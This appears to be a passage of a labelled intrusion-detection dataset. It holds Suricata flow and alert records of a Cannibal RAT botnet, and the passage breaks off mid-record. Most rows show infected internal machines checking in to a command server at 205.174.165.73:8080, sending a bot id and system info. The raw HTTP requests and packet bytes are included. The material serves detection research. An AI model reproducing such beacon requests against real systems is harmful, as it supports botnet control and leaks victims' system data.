192.168.10.14-51597-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4483577, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:10 | 73,838 | Friday | [{'timestamp': '2017-07-07T13:26:10.205397+0000', 'flow_id': 2139368507704689, 'pcap_cnt': 4483577, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51597, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:10.132465+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGQZAAIAGpBvAqAoOza6lScmNH5DPNnAy1nl2hVARAQD7ngAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:10.205397+0000', 'flow_id': 2139368507704689, 'pcap_cnt': 4483577, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51597, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:10.132465+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGQZAAIAGpBvAqAoOza6lScmNH5DPNnAy1nl2hVARAQD7ngAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,075 |
192.168.10.15-52258-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4483720, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:11 | 93,133 | Friday | [{'timestamp': '2017-07-07T13:26:11.630253+0000', 'flow_id': 285140931785833, 'pcap_cnt': 4483720, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52258, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:11.537705+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobtNAAIAGTk3AqAoPza6lScwiH5Au9/nyDdOw5VARAQCdzgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:11.630253+0000', 'flow_id': 285140931785833, 'pcap_cnt': 4483720, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52258, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:11.537705+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobtNAAIAGTk3AqAoPza6lScwiH5Au9/nyDdOw5VARAQCdzgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,080 |
192.168.10.14-51598-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4487502, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:20 | 82,323 | Friday | [{'timestamp': '2017-07-07T13:26:20.288461+0000', 'flow_id': 1549755397973955, 'pcap_cnt': 4487502, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51598, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:20.206787+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGQtAAIAGpBbAqAoOza6lScmOH5B/NPRmskWC8lARAQDfMgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:20.288461+0000', 'flow_id': 1549755397973955, 'pcap_cnt': 4487502, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51598, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:20.206787+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGQtAAIAGpBbAqAoOza6lScmOH5B/NPRmskWC8lARAQDfMgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,193 |
192.168.10.15-52259-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4487594, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:21 | 74,593 | Friday | [{'timestamp': '2017-07-07T13:26:21.705377+0000', 'flow_id': 369395305915166, 'pcap_cnt': 4487594, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52259, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:21.631582+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobthAAIAGTkjAqAoPza6lScwjH5ASRVmltBO/pVARAQClzAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:21.705377+0000', 'flow_id': 369395305915166, 'pcap_cnt': 4487594, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52259, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:21.631582+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobthAAIAGTkjAqAoPza6lScwjH5ASRVmltBO/pVARAQClzAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,194 |
192.168.10.14-51599-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4488912, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:30 | 66,405 | Friday | [{'timestamp': '2017-07-07T13:26:30.355256+0000', 'flow_id': 1704619034438506, 'pcap_cnt': 4488912, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51599, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:30.289642+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGRBAAIAGpBHAqAoOza6lScmPH5BclJlBEDO061ARAQDNEAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:30.355256+0000', 'flow_id': 1704619034438506, 'pcap_cnt': 4488912, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51599, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:30.289642+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGRBAAIAGpBHAqAoOza6lScmPH5BclJlBEDO061ARAQDNEAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,241 |
192.168.10.15-52260-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4489027, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:31 | 103,860 | Friday | [{'timestamp': '2017-07-07T13:26:31.797253+0000', 'flow_id': 1657958509811621, 'pcap_cnt': 4489027, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52260, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': 